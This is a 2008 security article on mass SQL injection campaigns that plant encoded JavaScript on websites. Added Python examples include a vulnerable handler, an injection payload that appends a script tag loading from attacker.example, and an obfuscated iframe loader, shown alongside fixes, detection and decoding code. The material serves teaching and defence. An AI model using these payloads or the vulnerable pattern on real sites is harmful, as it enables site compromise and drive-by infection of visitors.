By Ryan Sherstobitoff
July 11, 2008 10:45 AM EDT
SQL injection is becoming one of the primary delivery mechanisms for malicious scripts that attackers plant on legitimate websites. Recent incidents show the technique is popular with well-organized criminal groups, not least because of the number of sites they can compromise almost overnight; victims have included the United Nations and the Department of Homeland Security (DHS).[1] The compromised site is then used as a vehicle for distributing Trojans: the SQL injection inserts encoded JavaScript into the site's pages, and that JavaScript does the rest.
The worrying part is that the average infection rate on "protected" networks is anywhere from 70–75%, according to research PandaLabs conducted on more than 1,200 networks worldwide.[2] The study ran for two months using www.infectedornot.com and www.malwareradar.com, as part of an ongoing investigation into the prevalence of criminal activity on the Internet. The figures come from PCs that had up-to-date anti-virus software yet were still infected with malware already known to the industry.
What puzzles researchers is how criminals are getting into websites without administrative privileges and without exploiting a vulnerability specific to any one server. The answer is that attackers have found a generic SQL injection string that works against any site that concatenates unvalidated request parameters into its database queries, and they have used it to plant JavaScript in hundreds of thousands of sites, in some cases within hours. The key is a string generic enough to work across very different sites and schemas yet effective 80–90% of the time.
The sites that fall victim are ones you would not normally expect to host malicious scripts, for example www.flowers.com, www.dhs.gov, and www.un.org. Highly popular sites let attackers reach as many visitors as possible; if profit is the motive, they are a perfect breeding ground for criminal activity.
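To make the mechanism concrete, here is an added example, my own illustration rather than code from the article or from Panda. It shows a request handler that pastes a request parameter straight into SQL so that stacked statements run, the same handler with a bound parameter, a constructed payload that appends a script tag to text columns, and a schema-agnostic sweep that finds injected tags in every text column of a database. It uses Python's sqlite3 against a constructed in-memory schema rather than the ASP and MS SQL Server stacks of the period; the host attacker.example and all table and column names are assumptions. Real mass-injection strings achieve their generality by walking the database's own catalog with dynamic SQL, which SQLite lacks, so the payload here names its target tables explicitly.

```python
import sqlite3

# Constructed sample schema and rows for the demonstration (not from the article).
SCHEMA = """
CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, description TEXT);
CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, body TEXT, hits INTEGER);
INSERT INTO products VALUES (1, 'Roses', 'A dozen red roses');
INSERT INTO products VALUES (2, 'Tulips', 'Spring tulips');
INSERT INTO news VALUES (1, 'Opening hours', 'Open 9 to 5', 10);
"""

# Hypothetical attacker host; the article does not name the real ones.
SCRIPT_TAG = "<script src=http://attacker.example/x.js></script>"

# The injected request parameter. A mass campaign's string would enumerate the
# database catalog to hit every text column; SQLite has no dynamic SQL, so this
# constructed payload names its target tables explicitly.
PAYLOAD = (
    "1; UPDATE products SET description = description || '" + SCRIPT_TAG + "';"
    " UPDATE news SET body = body || '" + SCRIPT_TAG + "';"
)


def new_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def record_hit_vulnerable(conn, news_id):
    """Vulnerable pattern: the request parameter is pasted into the SQL text and
    run with executescript(), which executes every ';'-separated statement,
    just as classic ADO code against MS SQL Server runs stacked queries."""
    conn.executescript("UPDATE news SET hits = hits + 1 WHERE id=" + news_id)


def record_hit_safe(conn, news_id):
    """Hardened pattern: the parameter is bound, never parsed as SQL. A value of
    '1; UPDATE ...' is compared as text against an integer id and matches
    nothing. Returns the number of rows updated."""
    cur = conn.execute("UPDATE news SET hits = hits + 1 WHERE id=?", (news_id,))
    return cur.rowcount


def hits(conn, news_id=1):
    return conn.execute("SELECT hits FROM news WHERE id=?", (news_id,)).fetchone()[0]


def find_injected_scripts(conn, marker="<script"):
    """Schema-agnostic sweep: every non-numeric column of every table is searched
    for the marker, which is what a site owner needs after one of these
    campaigns. Table and column names come from the catalog, not from user
    input, so quoting them into the query is safe here."""
    found = []
    tables = [r[0] for r in conn.execute("SELECT name FROM sqlite_master WHERE type='table'")]
    for table in tables:
        for _cid, col, ctype, *_ in conn.execute(f'PRAGMA table_info("{table}")'):
            if "INT" in (ctype or "").upper():
                continue  # numeric columns cannot carry a script tag
            rows = conn.execute(
                f'SELECT rowid FROM "{table}" WHERE instr("{col}", ?) > 0', (marker,))
            found.extend((table, col, rowid) for (rowid,) in rows)
    return sorted(found)


def demo():
    """Runs the same request through both handlers and sweeps both databases."""
    victim, fixed = new_db(), new_db()
    record_hit_vulnerable(victim, PAYLOAD)
    updated = record_hit_safe(fixed, PAYLOAD)
    return {
        "victim_hits": hits(victim),
        "victim_infected": find_injected_scripts(victim),
        "fixed_rows_updated": updated,
        "fixed_infected": find_injected_scripts(fixed),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

The vulnerable handler still does exactly what it was written to do (the hit counter goes up by one), which is why these compromises go unnoticed: nothing in the application's own behaviour changes, only the rows that the next visitor's page is rendered from. The sweep is the check worth keeping: run it against a copy of the production database whenever a site is suspected of being used as a distribution vehicle.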
The encoded JavaScript embedded in the victim pages is only the delivery mechanism. The malware itself is not embedded in the page but hosted elsewhere, and in some cases the hosting server uses server-side polymorphism to hand out a different binary on each request. Before fetching anything, the script checks the visitor's PC against a list of common vulnerabilities and only then delivers the exploit that matches that environment. Some of these campaigns also use zero-day vulnerabilities to spread malware to unsuspecting users, as was the case with the recent Adobe Flash vulnerability.[3]
The JavaScript used to exploit the visitor's browser is obfuscated and encoded, which makes it hard to analyse. A common technique is URL (percent) encoding of each character's hexadecimal value, as in the fragment 65%3D%22%6A%61%76%, where each %XX is one character: %3D is =, %22 is a double quote, and %6A%61%76 spells jav. The script's true intention (exploiting browser vulnerabilities) therefore cannot be seen by simply viewing the .JS file; it takes some decoding to expose the exploit code and then build a defence against it.
The net effect is extra time and effort for the anti-virus lab engineer to build effective detection for malware delivered through encoded JavaScript. Meanwhile it is easy for the attacker to change the payload, since the malware resides on a completely separate server, and it would not surprise us if the binaries were rebuilt frequently.
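As an added example, not taken from the article, here is a small decoder for the three encoding layers most often stacked in these loaders: the %XX percent-encoding discussed above (which JavaScript's unescape() reverses), \xNN and \uNNNN string escapes, and String.fromCharCode(). The obfuscated sample is constructed for the demonstration and the host attacker.example is hypothetical. Applying all three decoders repeatedly until the text stops changing is what exposes the iframe and document.write that the first stage hides.

```python
import re

# Constructed sample of a three-layer obfuscated loader (not taken from any real
# site): percent-encoding handled by JavaScript's unescape(), \xNN string escapes,
# and String.fromCharCode(). The host attacker.example is hypothetical.
SAMPLE = r"""eval(unescape('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28String.fromCharCode(60,105,102,114,97,109,101,32,115,114,99,61,34)+"http://attacker.example/e.html"+"\x22 width=0 height=0>\x3C/iframe>")'))"""

PERCENT_RE = re.compile(r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})")
JS_ESCAPE_RE = re.compile(r"\\x([0-9A-Fa-f]{2})|\\u([0-9A-Fa-f]{4})")
FROMCHARCODE_RE = re.compile(r"String\.fromCharCode\(\s*([0-9,\s]+?)\s*\)")

# Markers an analyst looks for once the layers are off (order is reporting order).
INDICATORS = ("<script", "<iframe", "document.write", "eval(", "width=0", "height=0", ".js")


def decode_percent(text):
    """%XX and %uXXXX sequences, as JavaScript's unescape() consumes them.
    A lone % that is not followed by hex digits is left alone."""
    return PERCENT_RE.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), text)


def decode_js_escapes(text):
    """Backslash-x and backslash-u escapes inside JavaScript string literals."""
    return JS_ESCAPE_RE.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), text)


def decode_fromcharcode(text):
    """String.fromCharCode(97,108,...) becomes the characters it builds."""
    def build(m):
        return "".join(chr(int(c)) for c in m.group(1).split(",") if c.strip())
    return FROMCHARCODE_RE.sub(build, text)


def peel(script, max_rounds=10):
    """Applies all three decoders repeatedly until the text stops changing,
    because one layer usually hides another. Returns every intermediate stage
    so the analyst can see what each round exposed."""
    stages = [script]
    for _ in range(max_rounds):
        current = stages[-1]
        decoded = decode_fromcharcode(decode_js_escapes(decode_percent(current)))
        if decoded == current:
            break
        stages.append(decoded)
    return stages


def indicators(text):
    """Which of the usual drive-by markers appear in the decoded text."""
    lowered = text.lower()
    return [marker for marker in INDICATORS if marker in lowered]


if __name__ == "__main__":
    stages = peel(SAMPLE)
    for i, stage in enumerate(stages):
        print(f"stage {i}: {stage}")
    print("indicators:", indicators(stages[-1]))
```

This is a textual decoder, not a JavaScript interpreter: it leaves the surrounding eval(), quotes and + operators in place and only strips the encodings, which is enough to read the intent and pull out the hosting URL. Loaders that compute their next stage arithmetically or key it on document properties need an instrumented JavaScript engine instead.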
Recent campaigns have shown that between 250,000 and 500,000 sites can be compromised with one generic string almost overnight and with little effort.[4] Attackers use tools built on the Google search API to automate the discovery and validation of target sites, work that would otherwise have to be done manually, site by site.
Using Google, these tools run a broad set of searches over a huge population of websites, looking for sites that do not properly sanitize their inputs or that carry other generic web-coding vulnerabilities.
Attackers can now reach almost anyone, regardless of the protection consumers and businesses have installed on their networks and PCs. SQL injection attacks are becoming more prevalent as the anonymity the Internet affords attackers makes them ever harder to catch. Your best bet is to make sure your own web applications never pass untrusted input into SQL queries, and to monitor your network and systems frequently so that a compromise is detected before your site is used against its visitors.
References
[1] Goodin, Dan. "Department of Homeland Security website hacked!" The Register.
[2] Bustamante, Pedro. "Think you're protected? Think again." Panda Research Blog.
[3] Maone, Giorgio. "Unpatched Flash Vulnerability Widely Exploited in the Wild." http://hackademix.net.
[4] SC Magazine podcast on the massive SQL injection attack.
Copyright © 2008 SYS-CON Media, Inc. — All Rights Reserved.
Syndicated stories and blog feeds, all rights reserved by the author.
Ryan Sherstobitoff is the Chief Corporate Evangelist at Panda Security USA (www.pandasecurity.com). He is widely recognized as a security expert throughout the country and lectures audiences across the U.S. on cybercrime trends as well as corporate risk assessments. He can be reached at ryans@us.pandasecurity.com or through the PandaLabs blog at http://pandalabs.pandasecurity.com/.